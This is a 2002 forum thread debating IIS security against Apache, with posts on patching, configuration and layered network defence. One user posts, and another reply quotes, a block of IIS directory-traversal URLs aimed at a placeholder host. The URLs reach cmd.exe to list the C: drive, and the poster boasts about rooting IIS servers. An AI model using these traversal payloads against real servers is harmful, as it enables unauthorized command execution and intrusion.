The Power of IIS

Printable View

April 15th, 2002, 03:55 PM
bimmer

The Power of IIS

what you need to know about running IIS and get useful of it .... you'll find it here ...

1- IIS allows universal CrossSiteScripting
2- Remote control of IIS
3- Microsoft IIS local and remote DoS
4- All versions of Microsoft IIS Remote buffer overflow (SYSTEM Level Access)
5- Unchecked Buffer in ISAPI Extension Could Enable Compromise of IIS 5.0 Server

http://www.astalavista.com/library/auditing/webserver/
April 15th, 2002, 07:19 PM
Tedob1

you sure are current!
April 15th, 2002, 08:12 PM
linuxcomando

Or you could just run linux ;).
April 17th, 2002, 07:34 AM
bimmer

yeah ... linux will be a gr8 idea ... ;)
April 21st, 2002, 07:34 AM
Truti

Hey Dude!

I whoud never run a IIS 4,5 server if i where you!
I'm spacialist i bug finding in IIS 4, 5 and it's not small bugs there are.... Plenty of big Remote Bugs!

try:

****************************************************************************************************************

http://www.TARGET.dk/scripts/..%255c...exe?/c+dir+c:\

http://www.TARGET.dk/msadc/..%255c.....exe?/c+dir+c:\

http://www.TARGET.dk/cgi-bin/..%255c...exe?/c+dir+c:\

http://www.TARGET.dk/samples/..%255c...exe?/c+dir+c:\

http://www.TARGET.dk/iisadmpwd/..%25...exe?/c+dir+c:\

http://www.TARGET.dk/_vti_cnf/..%255...system32/cmd.e
xe?/c+dir+c:\

http://www.TARGET.dk/_vti_bin/..%255...system32/cmd.e
xe?/c+dir+c:\

http://www.TARGET.dk/adsamples/..%25...system32/cmd.e
xe?/c+dir+c:\

****************************************************************************************************************

Then you will get a DIR over the target server.... But this is on a fresh install but there are 1000 of bugs in this shitty IIS servers..... I run Apache and it's what i will say the most stabil server i ever have discoverd! I have only positive words for Apache!

Give me 5 min and i will have a ROOT ascount on you'r IIS server!
April 21st, 2002, 03:41 PM
bimmer

i've post the thread coz' lots of members were asking about that issue ... as for me i don't even use it ;)
April 22nd, 2002, 10:42 PM
knightmb

Quote:

Originally posted here by Truti
Hey Dude!

I whoud never run a IIS 4,5 server if i where you!
I'm spacialist i bug finding in IIS 4, 5 and it's not small bugs there are.... Plenty of big Remote Bugs!

try:

****************************************************************************************************************

http://www.TARGET.dk/scripts/..%255c...exe?/c+dir+c:\

http://www.TARGET.dk/msadc/..%255c.....exe?/c+dir+c:\

http://www.TARGET.dk/cgi-bin/..%255c...exe?/c+dir+c:\

http://www.TARGET.dk/samples/..%255c...exe?/c+dir+c:\

http://www.TARGET.dk/iisadmpwd/..%25...exe?/c+dir+c:\

http://www.TARGET.dk/_vti_cnf/..%255...system32/cmd.e
xe?/c+dir+c:\

http://www.TARGET.dk/_vti_bin/..%255...system32/cmd.e
xe?/c+dir+c:\

http://www.TARGET.dk/adsamples/..%25...system32/cmd.e
xe?/c+dir+c:\

****************************************************************************************************************

Then you will get a DIR over the target server.... But this is on a fresh install but there are 1000 of bugs in this shitty IIS servers..... I run Apache and it's what i will say the most stabil server i ever have discoverd! I have only positive words for Apache!

Give me 5 min and i will have a ROOT ascount on you'r IIS server!

Assuming that apache runs all these application mappings correct?
I've been using it (IIS) for years now and never had any problems with hacks, nimda, or the like. The first thing I did back in March of 2000 when IIS 5 came out with Win2k was remove ALL application mappings, virtual directories and like.
Sure I keep up with patches, but the exploits I find always target mappings I don't use. So I'm not too worried. I also write my own programs to monitor my server for suspisous activity and have had fun sending hackers to my http blackhole many times :)
I too, stay away from MS remote tools, I create my own, works much better :)
You can really get ROOT of IIS in under 5 minutes? If I e-mail you my server address would you feel free to root it for me, I will at least have piece of mind because rooting my own machine just doesn't satisfy me about the security setup I have.
April 22nd, 2002, 11:00 PM
draziw

Quote:

Originally posted here by knightmb

You can really get ROOT of IIS in under 5 minutes? If I e-mail you my server address would you feel free to root it for me, I will at least have piece of mind because rooting my own machine just doesn't satisfy me about the security setup I have.

Well, in my opinion, just having to keep up with the patches on IIS far outweighs its usefulness. That is, I don't like to have to patch a box every week for fear of getting the site defaced either through a worm or someone's "lack of something better to do." Running Apache, on the other hand, I'm usually happy to be able to read the CHANGES file at my relative leisure, then make a calculated decision if I need to recompile the thing or not... I'm happy to say that, mostly, there's not a usually huge rush to replace an Apache install for fear of it getting whacked - for the last few IIS vulnerabilities I've seen, usually the server's 0wn3d before you can get it replaced (ok, maybe not always that bad, but the urgency is usually severely heightened).
April 23rd, 2002, 12:19 AM
P4XEON

There is no best one.

Microsoft's IIS and Apache HTTP are both equal. If they are both properly configured properly
they are resistant to almost all attacks. But then there are a few exceptions like an exploit
that allows a cracker access.

THE LARGEST REASON FOR WEB SERVERS AND BEING HACKED IS THE RESULT OF POOR ADMINISTRATION

Both IIS and Apache have exploits, but IIS's are more publisized. There is no webserver that
is better then the other. If you reley on just the default settings you deserved being hacked.

Networks shoule have multiple security defenses and plans. Such as the following

Border router
Perimeter network (DMZ)
software firewall
packet filtering/inspection from software or hardware
Change standard ports eg. Telnet, SSH
etc.

Just though i would point that out.
April 23rd, 2002, 01:25 AM
draziw

Re: There is no best one.

Quote:

Originally posted here by P4XEON
Microsoft's IIS and Apache HTTP are both equal. If they are both properly configured properly
they are resistant to almost all attacks. But then there are a few exceptions like an exploit
that allows a cracker access.

THE LARGEST REASON FOR WEB SERVERS AND BEING HACKED IS THE RESULT OF POOR ADMINISTRATION

I mostly agree with that, except:

1) Take both IIS and Apache out of the box and run it. Chances are, the Apache server is going to be reasonably configured and won't have any serious issues - the same is almost certainly not true for the IIS box.

2) Most "I can run a website" n00bs are going to probably want the point-and-clickness of something like IIS, and aren't going to bother to RTFM. This increases the problem significantly.

3) Looking at SecurityFocus and/or CERT (to mention only a couple), there are certainly more IIS warnings than Apache. Given market penetration of Apache, I'm unlikely to believe that it's "just because M$ is being targetted."

I can only conclude that, overall, IIS is going to be a much bigger burden to manage and/or admin than Apache. Plus, I don't need to run a GUI to run an efficient Apache server (kinda helps, since most of my machines I run without a head).

And has anyone ever tried to chroot an IIS instance or otherwise sandbox it?